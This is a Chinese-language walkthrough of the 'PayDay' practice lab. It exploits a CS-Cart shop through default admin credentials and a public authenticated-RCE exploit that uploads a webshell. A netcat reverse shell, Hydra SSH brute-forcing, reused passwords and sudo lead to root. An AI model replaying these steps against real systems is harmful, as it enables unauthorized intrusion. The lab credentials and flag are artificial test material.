OSCP靶场–PayDay
考点(公共exp文件上传+密码复用+sudo -l all提权)
1.nmap扫描
##
┌──(root㉿kali)-[~/Desktop]
└─# nmap -sV -sC 192.168.153.39 -p- -Pn --min-rate 2500
Starting Nmap 7.92 ( https://nmap.org ) at 2024-04-13 04:52 EDT
Nmap scan report for 192.168.153.39
Host is up (0.24s latency).
Not shown: 65527 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
| ssh-hostkey:
| 1024 f3:6e:87:04:ea:2d:b3:60:ff:42:ad:26:67:17:94:d5 (DSA)
|_ 2048 bb:03:ce:ed:13:f1:9a:9e:36:03:e2:af:ca:b2:35:04 (RSA)
80/tcp open http Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
|_http-server-header: Apache/2.2.4 (Ubuntu) PHP/5.2.3-1ubuntu6
|_http-title: CS-Cart. Powerful PHP shopping cart software
110/tcp open pop3 Dovecot pop3d
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2008-04-25T02:02:48
|_Not valid after: 2008-05-25T02:02:48
|_ssl-date: 2024-04-13T08:54:02+00:00; +7s from scanner time.
|_pop3-capabilities: RESP-CODES PIPELINING SASL TOP UIDL CAPA STLS
|_sslv2: ERROR: Script execution failed (use -d to debug)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: MSHOME)
143/tcp open imap Dovecot imapd
|_ssl-date: 2024-04-13T08:54:03+00:00; +7s from scanner time.
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2008-04-25T02:02:48
|_Not valid after: 2008-05-25T02:02:48
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
|_ SSL2_DES_192_EDE3_CBC_WITH_MD5
|_imap-capabilities: MULTIAPPEND completed THREAD=REFERENCES IDLE Capability STARTTLS CHILDREN IMAP4rev1 LOGINDISABLEDA0001 LOGIN-REFERRALS SORT OK NAMESPACE SASL-IR LITERAL+ UNSELECT
445/tcp open netbios-ssn Samba smbd 3.0.26a (workgroup: MSHOME)
993/tcp open ssl/imap Dovecot imapd
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2008-04-25T02:02:48
|_Not valid after: 2008-05-25T02:02:48
|_ssl-date: 2024-04-13T08:54:01+00:00; +7s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
|_ SSL2_DES_192_EDE3_CBC_WITH_MD5
995/tcp open ssl/pop3 Dovecot pop3d
|_ssl-date: 2024-04-13T08:54:01+00:00; +7s from scanner time.
| ssl-cert: Subject: commonName=ubuntu01/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2008-04-25T02:02:48
|_Not valid after: 2008-05-25T02:02:48
|_pop3-capabilities: RESP-CODES PIPELINING SASL(PLAIN) TOP UIDL CAPA USER
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
|_ SSL2_DES_192_EDE3_CBC_WITH_MD5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelHost script results:
|_clock-skew: mean: 40m07s, deviation: 1h37m59s, median: 6s
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Unix (Samba 3.0.26a)
| Computer name: payday
| NetBIOS computer name:
| Domain name:
| FQDN: payday
|_ System time: 2024-04-13T04:53:46-04:00Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 69.50 seconds2.user priv
2.1方法1: LFI存在,无法反弹shell 其他exp[文件上传]反弹
## google搜索exp:cs cart exploit
## 发现LFI漏洞:
https://www.exploit-db.com/exploits/48890## 本地文件包含LFI:日志投毒:
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion#rce-via-ssh#####################
## 本地文件包含经过测试,发现无法利用:########################
## searchsploit搜索exp:
┌──(root㉿kali)-[~/Desktop]
└─# searchsploit CS cart
--------------------------------------------------------------------------------------------------- -------------------------------Exploit Title | Path
--------------------------------------------------------------------------------------------------- -------------------------------
CS-Cart 1.3.3 - authenticated RCE | php/webapps/48891.txt┌──(root㉿kali)-[~/Desktop]
└─# searchsploit -m php/webapps/48891.txtExploit: CS-Cart 1.3.3 - authenticated RCEURL: https://www.exploit-db.com/exploits/48891Path: /usr/share/exploitdb/exploits/php/webapps/48891.txtCodes: N/AVerified: False
File Type: ASCII text
Copied to: /root/Desktop/48891.txt########################
## 弱密码admin:admin登陆成功:
## 因为在web功能中没有找到上传的功能点,exp中也没有说明,使用下面关键字google,找到详细利用过程:
## google:cs-cart webshell
https://gist.github.com/momenbasel/ccb91523f86714edb96c871d4cf1d05c#######################################
## 浏览器访问:192.168.153.39/skins/lrshell.phtml#################################
##
┌──(root㉿kali)-[~/Desktop]
└─# nc -lvvp 22
listening on [any] 22 ...
192.168.153.39: inverse host lookup failed: Unknown host
connect to [192.168.45.195] from (UNKNOWN) [192.168.153.39] 42751
Linux payday 2.6.22-14-server #1 SMP Sun Oct 14 23:34:23 GMT 2007 i686 GNU/Linux06:38:20 up 1:49, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("bash")'
www-data@payday:/$ whoami
whoami
www-data
www-data@payday:/$ 
反弹shell:
方法2:LFI读取/etc/passwd 收集用户ssh爆破:
## LFI可以读取/etc/passwd但是利用无法反弹shell
## 可以尝试读取/etc/passwd后读取私钥或者收集用户进行ssh爆破:
## patrick处于/home/中,并且可以使用/bin/bash,对其进行爆破:
## patrick:x:1000:1000:patrick,,,:/home/patrick:/bin/bash
##################
##
┌──(root㉿kali)-[~/Desktop]
└─# hydra -l patrick -P /usr/share/wordlists/rockyou.txt 192.168.153.39 ssh -V
[22][ssh] host: 192.168.153.39 login: patrick password: patrick
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 6 final worker threads did not complete until end.
[ERROR] 6 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-04-13 06:48:10
3. root priv[密码复用提权+sudo -l all提权]
## linpeas枚举并没有发现有效信息:
## 手动查看config.php中的密码,进入数据库查看md5解密也没有有效信息:
www-data@payday:/var/www$ cat config.php
<?php//
// $Id: config.php 1822 2006-05-17 16:44:43Z
//if ( !defined('IN_CSCART') ) { die('Access denied'); }$db_host = 'localhost';
$db_name = 'cscart';
$db_user = 'root';
$db_password = 'root';###############
## 最后查看存在的用户:选择/home下的用户,patrick进行爆破:
www-data@payday:/var/www$ cat /etc/passwd | grep -v nologin
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
dhcp:x:100:101::/nonexistent:/bin/false
syslog:x:101:102::/home/syslog:/bin/false
klog:x:102:103::/home/klog:/bin/false
mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false
dovecot:x:104:111:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
postfix:x:105:112::/var/spool/postfix:/bin/false
patrick:x:1000:1000:patrick,,,:/home/patrick:/bin/bash
www-data@payday:/var/www$ ####################
## 爆破成功:
┌──(root㉿kali)-[~/Desktop]
└─# hydra -l patrick -P /usr/share/wordlists/rockyou.txt 192.168.153.39 ssh -V
[22][ssh] host: 192.168.153.39 login: patrick password: patrick
1 of 1 target successfully completed, 1 valid password found###############
## 切换到用户patrick:
www-data@payday:/var/www$ su patrick
Password:
patrick@payday:/var/www$ ##########################
## 在当前用户patrick下使用linpeas继续枚举,
## 依然没有发现有效信息:
##########################
patrick@payday:/tmp$ id
uid=1000(patrick) gid=1000(patrick) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),104(scanner),115(lpadmin),1000(patrick)
patrick@payday:/tmp$ sudo -l We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:#1) Respect the privacy of others.#2) Think before you type.#3) With great power comes great responsibility.[sudo] password for patrick:
User patrick may run the following commands on this host:(ALL) ALL
patrick@payday:/tmp$ sudo su root
root@payday:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@payday:/tmp# cat /root/proof.txt
1eaaa853e6acefced02d54f253104754
root@payday:/tmp# 
4.总结:
##
https://lipa.tech/posts/pg-payday/##
https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/linux/payday
